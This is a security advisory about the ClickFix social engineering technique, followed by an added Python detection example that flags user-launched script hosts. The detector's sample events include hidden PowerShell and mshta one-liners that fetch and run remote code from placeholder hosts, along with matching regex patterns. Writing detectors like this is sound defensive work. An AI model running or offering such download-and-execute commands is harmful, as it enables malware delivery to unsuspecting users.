Incident response plan necessary

Warning about ClickFix social engineering campaign

ClickFix is already being used by a number of nation-state actors, among them APT28 and Kimsuky. The technique is particularly popular for distributing stealer malware such as Lumma Stealer.

The operators trick users into executing malicious code on their own systems. Victims are lured to seemingly legitimate but compromised websites, where convincing pop-ups appear. These pop-ups prompt the user to click buttons labeled “Fix” or “I’m not a robot”. Once clicked, a command is silently copied to the user’s clipboard, and the user is instructed to paste it into a system terminal and run it themselves.


This technique was first discovered in mid-2024 and has been used more and more frequently since then. In addition to phishing, malvertising and SEO poisoning have also been observed as distribution techniques.

The following tips are intended to help those responsible for security recognize and remediate the problem:

ClickFix campaigns rely heavily on social engineering techniques such as phishing. The aim is to entice users to go to websites that download malicious software. Therefore, companies need to emphasize regular employee training that focuses on recognizing and responding to threats such as phishing. In addition, companies should have a procedure in place for employees who suspect they have been the victim of a phishing attack. This should include reporting to the relevant authorities and taking immediate action to contain the incident and minimize potential damage.


Companies should apply a “defense-in-depth” strategy to create robust security. This includes multiple independent security controls such as EDR, SIEM, network segmentation, identity and access management, and email/web filtering across the entire infrastructure. This multi-layered approach helps to detect and neutralize threats early, minimizing the potential damage.

Logging, asset visibility and continuous monitoring of systems are essential to detect and respond to threats like ClickFix. These capabilities provide a holistic view of the network and make it easier to identify anomalies that may signal an attack in progress. Consistent monitoring of endpoint activity and network traffic can surface suspicious behavior such as a user-launched shell that fetches and executes remote code.
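As an added example (not code from the article), the kind of endpoint detection logic this paragraph calls for: it scans constructed Sysmon-style process-creation events for a script host started by an interactive parent with a command line that downloads and executes remote code, which is the shape a pasted ClickFix command takes. Event fields, file paths, hostnames and the trait patterns are assumptions, not indicators from the article.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry);
# paths, hosts and commands are assumptions for this example.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/a | iex"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
    {"id": 4, "parent": r"C:\Program Files\Deploy\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://updates.example.invalid/p.ps1 | iex"'},
]

# Script hosts a pasted one-liner typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a person typed or pasted the command (Run dialog, File Explorer, terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Command-line traits of a one-liner that fetches and runs remote code.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xec|xecutionpolicy)\s+bypass", re.I),
    "download": re.compile(r"\b(?:iwr|invoke-webrequest|curl|downloadstring)\b", re.I),
    "eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_hta": re.compile(r"mshta(?:\.exe)?\s+\"?https?://", re.I),
}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def clickfix_traits(event):
    """Traits matched by one event, or [] when it is not a user-launched script host."""
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return []  # scripted launches (event 4) belong to other rules
    return [name for name, rx in TRAITS.items() if rx.search(event["cmdline"])]

def triage(events, min_traits=1):
    """Map event id -> matched traits for events with at least min_traits hits."""
    hits = {}
    for ev in events:
        traits = clickfix_traits(ev)
        if len(traits) >= min_traits:
            hits[ev["id"]] = traits
    return hits
```

Raising `min_traits` trades recall for precision; the plain `powershell Get-Process` launch (event 3) is never flagged, while the same download cradle started by an automated parent (event 4) is left to a separate rule.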

Companies must have a well-defined incident response plan to ensure that they can respond quickly and effectively to security incidents. It is equally important to conduct regular incident response drills. These exercises help to identify gaps in the response strategy and train staff to recognize incidents and respond correctly.
